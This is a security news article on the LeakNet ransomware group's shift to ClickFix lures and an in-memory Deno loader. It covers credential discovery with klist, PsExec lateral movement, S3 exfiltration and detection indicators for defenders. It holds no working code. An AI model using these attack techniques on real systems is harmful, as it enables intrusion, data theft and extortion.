LeakNet Ransomware Ditches IABs for ClickFix and Deno

The LeakNet ransomware operation has shifted tactics, abandoning traditional initial access brokers in favor of ClickFix social engineering delivered through compromised legitimate websites. The group now deploys a staged command-and-control loader built on the Deno JavaScript runtime, executing payloads directly in memory to minimize forensic evidence.

According to ReliaQuest research, LeakNet is "casting a wide net to infect as many victims as possible" rather than pursuing targeted intrusions.

From IABs to Self-Service Initial Access

LeakNet's pivot away from initial access brokers represents a strategic shift in ransomware economics. Rather than purchasing credentials from underground markets—introducing delays, costs, and dependencies—the group now generates its own entry points by embedding ClickFix lures into hacked websites.

The ClickFix technique tricks users into copying and pasting an msiexec.exe command into the Windows Run dialog. Visitors to compromised sites encounter fake CAPTCHA verification prompts or error messages that claim the user must run a command to proceed. It's crude, but it works.

We've covered ClickFix campaigns extensively, including the WordPress compromise operation affecting 250 sites that distributed Vidar and Vodka stealers. LeakNet's adoption signals that even ransomware operators see value in this technique over traditional access methods.

The Deno Loader

What sets LeakNet apart from other ClickFix-enabled threats is the post-compromise tooling. The group uses a staged loader built on Deno, the TypeScript and JavaScript runtime created by Node.js founder Ryan Dahl.

The system executes Base64-encoded JavaScript directly in memory. According to the technical analysis, the payload fingerprints the compromised system, contacts external servers to retrieve next-stage malware, and enters a polling loop for repeated code execution—all without writing files to disk.

This approach minimizes forensic artifacts. Traditional antivirus solutions rely heavily on file scanning, so in-memory execution represents an effective evasion technique. Detection requires behavioral monitoring and memory analysis rather than signature matching.

Post-Compromise Activity

After successful execution, LeakNet operators follow a predictable playbook:

1. Credential harvesting - Running cmd.exe /c klist to identify active authentication credentials
2. DLL side-loading to launch malicious components through legitimate executables
3. Lateral movement via PsExec to spread across the network
4. S3 bucket abuse for staging and exfiltration, exploiting normal cloud traffic patterns
5. Data theft and encryption as the final payload

The use of S3 buckets for exfiltration is particularly notable. Organizations that allow outbound traffic to AWS by default—which is most of them—provide natural cover for data theft. Security teams should monitor for unusual S3 activity, especially from hosts that don't typically interact with cloud storage.

Detection Guidance

ReliaQuest identifies several indicators that suggest LeakNet activity:

• Deno runtime execution outside development environments
• Suspicious 'misexec' execution initiated from browsers
• Abnormal PsExec usage patterns
• Unexpected outbound traffic to S3 endpoints
• DLL sideloading in unusual directories

The challenge is distinguishing malicious Deno usage from legitimate development activity. Context matters—a developer workstation running Deno during business hours differs significantly from an accounting machine executing Deno at 2 AM after the user visited a questionable website.

For organizations using EDR solutions, create detection rules that flag Deno execution on non-developer machines. The Microsoft macos infostealers report documented similar runtime abuse with Python, suggesting this evasion pattern will only grow more common.

Why This Matters

LeakNet emerged publicly in November 2024, marketing itself as a "digital watchdog" focused on internet freedom—the typical ideological veneer ransomware groups use for public relations. The group currently averages about three victims per month, but the tactical shift to ClickFix suggests scaling ambitions.

The move from IAB-dependent access to self-generated initial access removes a significant bottleneck. Credential purchases introduce delays and costs; ClickFix campaigns can operate continuously at minimal expense once the infrastructure is deployed.

For defenders, this means ransomware operators increasingly control their entire attack chain. The traditional defensive assumption that you can disrupt ransomware by targeting IABs no longer holds for groups like LeakNet.

Security awareness training should explicitly cover ClickFix scenarios. Users need to understand that legitimate websites don't ask them to copy commands into the Run dialog—ever. Combined with technical controls that restrict msiexec execution from user context, organizations can significantly reduce their exposure to this attack vector.

If you want to understand ransomware defense fundamentals, our ransomware guide covers the basics of how these operations work and what organizations can do to protect themselves.